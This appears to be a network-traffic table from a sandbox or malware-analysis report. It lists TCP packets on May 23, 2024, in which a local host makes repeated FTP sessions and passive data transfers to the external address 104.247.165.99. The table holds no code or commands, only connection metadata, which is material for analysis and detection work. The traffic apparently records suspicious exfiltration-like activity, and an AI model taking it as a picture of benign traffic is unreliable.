May 23, 2024 20:28:01.254194021 CEST | 21 | 49745 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:01.254508972 CEST | 49745 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.366137028 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.372268915 CEST | 21 | 49746 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:08.372361898 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.372647047 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:08.426268101 CEST | 21 | 49746 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:08.426516056 CEST | 49746 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:13.202949047 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.146158934 CEST | 21 | 49747 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:14.146230936 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.146580935 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:14.156047106 CEST | 21 | 49747 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:14.156096935 CEST | 49747 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.234893084 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.241636038 CEST | 21 | 49748 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:15.241738081 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.241967916 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:15.298125982 CEST | 21 | 49748 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:15.298660040 CEST | 49748 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.388930082 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.393938065 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.399079084 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.399239063 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:19.465365887 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.511895895 CEST | 21 | 49749 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:19.513102055 CEST | 49749 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.005481958 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.011487007 CEST | 21 | 49750 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:20.011586905 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.011904001 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:20.073707104 CEST | 21 | 49750 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:20.073780060 CEST | 49750 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.349301100 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.355204105 CEST | 21 | 49751 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:26.355261087 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.355448008 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:26.405953884 CEST | 21 | 49751 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:26.405998945 CEST | 49751 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.714827061 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.721086025 CEST | 21 | 49752 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:30.721184969 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.721434116 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:30.781487942 CEST | 21 | 49752 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:30.781595945 CEST | 49752 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:45.846199036 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:45.851243019 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:45.851324081 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:46.731831074 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:46.732157946 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:46.746335983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.127262115 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.127713919 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.132756948 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.617975950 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.619019032 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.624151945 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.921236992 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:47.921576977 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:47.926567078 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.150744915 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.151035070 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.207576036 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.499938965 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.500075102 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.505131006 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.805833101 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.806586981 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.851363897 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.853885889 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:48.854098082 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.854190111 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:48.876631021 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.593909979 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.598907948 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.606357098 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606368065 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606378078 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.606558084 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.608469963 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608479977 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608489990 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608499050 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608508110 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.608642101 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.610196114 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.610388041 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.617858887 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.618066072 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.627258062 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627273083 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627284050 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627300978 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627316952 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627326965 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.627351999 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.627405882 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.628094912 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.628107071 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.628314972 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.636593103 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.648252010 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:49.664282084 CEST | 62592 | 49754 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:49.666683912 CEST | 49754 | 62592 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:50.311012983 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:50.366996050 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:28:50.381091118 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:28:50.381165028 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.326834917 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.340250015 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.568528891 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.571264982 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.577728033 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:00.578906059 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.578975916 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:00.679897070 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.207123995 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.207381964 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.213155985 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.213208914 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222420931 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222435951 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222445011 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222454071 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222461939 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222467899 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222470999 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222479105 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222510099 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.222516060 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222552061 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.222574949 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.231611967 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.231621981 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.231648922 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.231679916 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238817930 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238828897 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238836050 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238845110 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238852978 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238853931 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238862038 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238869905 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.238897085 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.238940954 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.245832920 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252717972 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252727032 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252734900 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.252743959 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.301573038 CEST | 64834 | 49755 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.301629066 CEST | 49755 | 64834 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.364968061 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:01.702121973 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:01.867197037 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.308434963 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.326623917 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.818742037 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.819273949 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.829797029 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:04.829866886 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.829952002 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:04.892028093 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.467633963 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.467901945 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.473220110 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.473380089 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.480151892 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480163097 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480170965 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480180025 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480189085 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480197906 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480206013 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480215073 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.480272055 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.489564896 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.489574909 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.489624977 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494360924 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494370937 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494379997 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494388103 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494395971 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494404078 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.494416952 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494438887 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.494477987 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.499164104 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.503923893 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.503935099 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.550035954 CEST | 58712 | 49756 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:05.550154924 CEST | 49756 | 58712 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.554502010 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:05.965930939 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:06.163846016 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.668451071 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.677800894 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.906666040 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.910501957 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.915430069 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:14.915560007 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.915680885 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:14.965992928 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.544559002 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.544807911 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.549992085 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.550045967 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555022001 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555033922 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555043936 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555054903 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555063963 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555074930 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555084944 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555093050 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555095911 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555104017 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.555141926 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.555166960 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.559859991 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.559909105 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.564688921 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564699888 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564707994 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564717054 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564721107 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.564743996 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.564769030 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.569499969 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.569574118 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.574305058 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.574317932 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.574327946 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579479933 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579492092 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579504013 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.579513073 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.601366997 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:15.606285095 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.606301069 CEST | 55953 | 49757 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:15.606357098 CEST | 49757 | 55953 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:16.068845987 CEST | 21 | 49753 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:16.210828066 CEST | 49753 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.453752995 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.469830990 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.469898939 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.470134974 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:41.487736940 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.487747908 CEST | 21 | 49758 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:41.487802982 CEST | 49758 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.043258905 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.054173946 CEST | 21 | 49759 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:56.054464102 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.054635048 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:56.106340885 CEST | 21 | 49759 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:56.112765074 CEST | 49759 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.073596954 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.078735113 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.078844070 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.728112936 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.728311062 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.733654976 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.975085020 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:29:59.975284100 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:29:59.980214119 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.230171919 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.230320930 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.235680103 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.459373951 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.459501028 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.464473009 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.683608055 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.683875084 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.695144892 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.930624008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:00.930823088 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:00.935805082 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.158257008 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.158885002 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.163907051 CEST | 61504 | 49761 | 104.247.165.99 | 192.168.2.4 |
May 23, 2024 20:30:01.164060116 CEST | 49761 | 61504 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.164067030 CEST | 49760 | 21 | 192.168.2.4 | 104.247.165.99 |
May 23, 2024 20:30:01.216165066 CEST | 21 | 49760 | 104.247.165.99 | 192.168.2.4 |
